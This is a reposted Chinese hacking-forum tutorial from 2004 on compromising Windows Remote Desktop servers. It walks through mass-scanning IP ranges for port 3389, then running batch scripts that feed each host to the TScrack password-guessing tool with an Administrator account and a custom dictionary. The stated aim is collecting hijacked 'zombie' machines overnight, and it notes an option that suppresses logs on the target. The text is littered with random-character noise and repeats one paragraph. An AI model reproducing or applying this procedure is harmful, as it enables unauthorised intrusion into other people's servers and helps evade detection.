QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2692|回复: 0
打印 上一主题 下一主题

终端服务真正的另类入侵

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-6 09:51 |只看该作者 |正序浏览
|招呼Ta 关注Ta

作者:霜风 QQ:14226581

9 |2 e+ v& \1 c0 z$ u j# G& P r

终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。+ ]: H$ R! ]! @$ W9 ~& f 这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: ( E2 K% f8 |# ~% n8 `8 c& {3 @首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下: ; j9 P' r. V2 o) h' ]( X; R ?) t先打开superscan3如图1 . h, C# P$ B# l2 m' [: m* T 7 n9 n# i* |# H8 D- |此主题相关图片如下:! P5 D" B- g' p6 Y4 q9 y: ^0 N' O, Y

, ^% |) {. b7 s

" x u$ e2 z$ }5 C8 X 接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2. n5 ^0 F& A) r2 `6 m* S& @$ H & w+ f( C0 @6 X2 t6 @: d此主题相关图片如下:4 t( s4 `7 b9 c( ?( @- b $ x, v. P. p! C+ X) S

+ {( L: V- ~( R( i5 V; i! ?% i

然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除. $ j% l5 n3 J9 B( S/ g8 n2 _& s这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3 9 A, E! o- j' o7 ~/ r8 l6 c! W. N- o 此主题相关图片如下:1 e: N: Y8 D9 ~# q: X

+ `; Y# p* _6 ^4 c

0 x, k! ] b5 A% ^ “|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。 , `/ s) ?# n% M. h! A 4 I9 K% C3 Z) |6 `此主题相关图片如下: - m& x V/ v# H

4 A! y* W" V$ T

接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5: ]$ Y- w H, K) d* q2 | 0 D0 X0 X" _7 x6 M4 w! B5 F 此主题相关图片如下: ; L, J; K2 [# b0 `6 M' {" K

; R t6 y4 K9 N: R3 M& O+ e

进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。 / }( ]0 w [; l( J) N所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。' ]- e# `0 x9 y: Q$ i TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。! S8 f5 w! L4 v; O* S8 U! p1 Z 此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。 ( {! B) v' L( z# K2 P8 X在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项: : \+ f. O8 D' v$ R5 J-h : Print usage help and exit0 c5 F7 m' b+ R- T -V : Print version info and exit& w4 ^( V1 j; e, a -s : Print chipher strenght info and exit4 Z6 d1 q) j0 e5 b -b : Enable failed password beep ' u( g+ i d, ~+ {-t : Use two simultaneous connections [EXPERIMENTAL]1 q6 R; \7 n: V6 M: N4 a8 Z; H" K -N : Prevent System Log entries on targeted server ; V9 V% Y' d* `5 {8 `2 s-U : Uninstall tscrack and remove components1 i5 ^+ m& {) [3 \. P -f <number> : Wordlist entry to start cracking with " J. ~; _5 ^8 z1 ~1 k2 p-F <delay> : Sampling Frequency (Delay between samples in ms)( o- q9 l9 p, n# ]: L -l <user> : Account name to use, defaults to Administrator " w# h* g) ~. v2 [/ J2 p-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted1 G8 m, q5 Q6 u" A. X -p <password> : Use <password> to logon instead of wordlist/blank pass8 D" g7 y" X5 u! v -D <domain> : Specify domain to attempt logon to

' X) w3 {# M+ e : V% |7 f: P* n8 ]% q+ ?6 l/ W # |3 B5 ^) p1 |# O$ F/ g( O我就帮忙翻译一下吧,翻译得不好可不要怪我啊:( ?, ~! Y8 {" C6 D -h : 显示使用帮助然后退出 * C4 j; f- S o, T/ W-V : 显示版本信息然后退出& B+ T' B" ]* d1 [. p -s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)1 \& h8 f/ f2 x -b : 密码错误时发出声音 6 ?, e. b+ ^/ Y6 r! j$ e-t : 同时发出多个连接,就是多线程。" L& O- B. U1 m" @ -N : Prevent System Log entries on targeted server ) F/ h& g( w9 V/ e C4 f-U : 卸载移除tscrack组件。! K0 ?" f9 {$ E, X; Z- P1 { S -f <number> : 使用-F后面的密码。 6 L6 m% ^0 b( A4 u3 K5 z$ v-F <delay> : 间隔时间(频率) / U, s% N* ^% t- c$ K+ @( u0 ^; j-l <user> : 使用-L后面的用户名 3 k$ M3 l( k! M0 A' k3 _-w <wordlist> : 使用-W后面的字典4 ~7 E; u% U# ?5 I$ _& V- w* ? -p <password> : 使用-W后的密码 ; g8 d4 \* K1 [' j-D <domain> : 登陆主页面?

! n( t P/ F8 ^ 相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:( v" B1 v/ a" p& M @if not exist IpcScan.txt goto noscan 9 Q$ z, g+ I* c) @( A C2 y@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i( |; ]/ ^, G' q, r& l% e :noscan ( B3 ~# n9 r# z( |, z* y% s@echo 3389.txt no find or scan faild

0 s* j& K. S5 v. P, v! \; w这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)

M k% L+ x4 ~7 } 保存后把后错名改为BAT就可以了。 " r) o! Y6 L$ z* } n2 X还写一个BAT,名字为HACK.BAT,代码如下:

8 j. K- ], F" i* M! ^- A7 B4 t@if not exist tscrack.exe goto noscan q- m; p" o' f" s) L) E @tscrack %1 -l administartor -w pass.dic >>rouji.txt 6 O/ O% f' Q7 l* b$ M:noscan # Z: r7 h! ^. F# j! r, L@echo tscrack.exe no find or scan faild

9 m1 O J$ `) s1 M2 r+ E 这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC 5 ~4 G# [0 T( N制作方法如上。" b5 R$ |1 M' N3 @% c" d- A3 ] 然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6% z* C: O2 C7 R; G7 p$ x " |6 h# i2 f9 ^$ o2 ^此主题相关图片如下: 5 _$ J) q0 |$ c3 { G, I8 D

怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.2 K d2 R+ ~$ a/ _! n 最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7 . V ?6 s+ }. d. q* c6 E- X+ ~8 i' d8 B$ J 此主题相关图片如下: 6 O3 J- ]9 O3 {4 a: R9 s & n1 \ N; `1 ^/ V怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic." N# V+ M+ w: Q 最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-8-30 17:41 , Processed in 1.836432 second(s), 52 queries .

回顶部